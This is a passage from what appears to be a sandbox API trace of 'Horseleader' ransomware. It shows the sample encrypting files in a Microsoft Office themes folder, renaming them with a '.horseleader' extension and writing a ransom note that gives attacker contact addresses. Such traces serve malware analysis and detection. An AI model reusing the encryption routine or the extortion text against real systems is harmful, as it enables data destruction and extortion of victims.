ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.024] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\..") returned 69 [0248.024] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.024] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.024] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.024] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.025] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 78 [0248.025] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.025] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.025] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.025] lstrlenW (lpString=".testttjffg") returned 11 [0248.025] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.025] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.025] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.026] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 78 [0248.026] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.026] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2527) returned 1 [0248.026] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x9df, lpOverlapped=0x0) returned 1 [0248.028] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff621, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.028] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x9df, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x9df, lpOverlapped=0x0) returned 1 [0248.028] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.028] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.029] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.029] CloseHandle (hObject=0x1a4) returned 1 [0248.029] GetProcessHeap () returned 0x780000 [0248.029] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.029] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.horseleader") returned 90 [0248.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.horseleader")) returned 1 [0248.030] GetProcessHeap () returned 0x780000 [0248.030] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.030] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab5b300, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2ab5b300, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x10af1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SPRING.ELM", cAlternateFileName="")) returned 1 [0248.030] lstrcmpiW (lpString1="SPRING.ELM", lpString2="Windows") returned -1 [0248.030] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM") returned 77 [0248.030] StrStrIW (lpFirst="SPRING.ELM", lpSrch=".horseleader") returned 0x0 [0248.031] lstrcmpW (lpString1="SPRING.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.031] lstrcmpW (lpString1="SPRING.ELM", lpString2="_uninstalling_.png") returned 1 [0248.031] lstrlenW (lpString=".testttjffg") returned 11 [0248.031] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM", lpSrch=".testttjffg") returned 0x0 [0248.031] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.031] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.031] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.033] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM") returned 77 [0248.033] StrStrW (lpFirst="SPRING.ELM", lpSrch=".txt") returned 0x0 [0248.033] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=68337) returned 1 [0248.033] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.033] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.035] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.036] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.036] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5d78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.036] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.037] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xbaf1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.037] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.038] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.038] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.038] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.038] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.038] CloseHandle (hObject=0x1a4) returned 1 [0248.038] GetProcessHeap () returned 0x780000 [0248.038] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.038] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM.horseleader") returned 89 [0248.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm.horseleader")) returned 1 [0248.042] GetProcessHeap () returned 0x780000 [0248.042] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.042] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1d2, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SPRING.INF", cAlternateFileName="")) returned 1 [0248.042] lstrcmpiW (lpString1="SPRING.INF", lpString2="Windows") returned -1 [0248.042] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF") returned 77 [0248.042] StrStrIW (lpFirst="SPRING.INF", lpSrch=".horseleader") returned 0x0 [0248.042] lstrcmpW (lpString1="SPRING.INF", lpString2="#Decrypt#.txt") returned 1 [0248.042] lstrcmpW (lpString1="SPRING.INF", lpString2="_uninstalling_.png") returned 1 [0248.043] lstrlenW (lpString=".testttjffg") returned 11 [0248.043] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF", lpSrch=".testttjffg") returned 0x0 [0248.043] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.043] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.044] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF") returned 77 [0248.044] StrStrW (lpFirst="SPRING.INF", lpSrch=".txt") returned 0x0 [0248.044] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=466) returned 1 [0248.045] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1d2, lpOverlapped=0x0) returned 1 [0248.046] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.046] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1d2, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1d2, lpOverlapped=0x0) returned 1 [0248.046] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.046] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.047] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.047] CloseHandle (hObject=0x1a4) returned 1 [0248.047] GetProcessHeap () returned 0x780000 [0248.047] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.047] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF.horseleader") returned 89 [0248.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf.horseleader")) returned 1 [0248.049] GetProcessHeap () returned 0x780000 [0248.049] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.049] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c45, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.049] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.049] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 79 [0248.050] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.050] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.050] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.050] lstrlenW (lpString=".testttjffg") returned 11 [0248.050] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.050] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.050] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.050] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.056] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 79 [0248.056] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.056] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=19525) returned 1 [0248.056] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4c45, lpOverlapped=0x0) returned 1 [0248.058] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb3bb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.058] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4c45, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4c45, lpOverlapped=0x0) returned 1 [0248.059] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.059] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.059] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.059] CloseHandle (hObject=0x1a4) returned 1 [0248.062] GetProcessHeap () returned 0x780000 [0248.062] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.062] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.horseleader") returned 91 [0248.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.horseleader")) returned 1 [0248.064] GetProcessHeap () returned 0x780000 [0248.064] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.064] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c45, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0248.064] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.064] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\#Decrypt#.txt") returned 80 [0248.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.065] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.065] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.066] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIY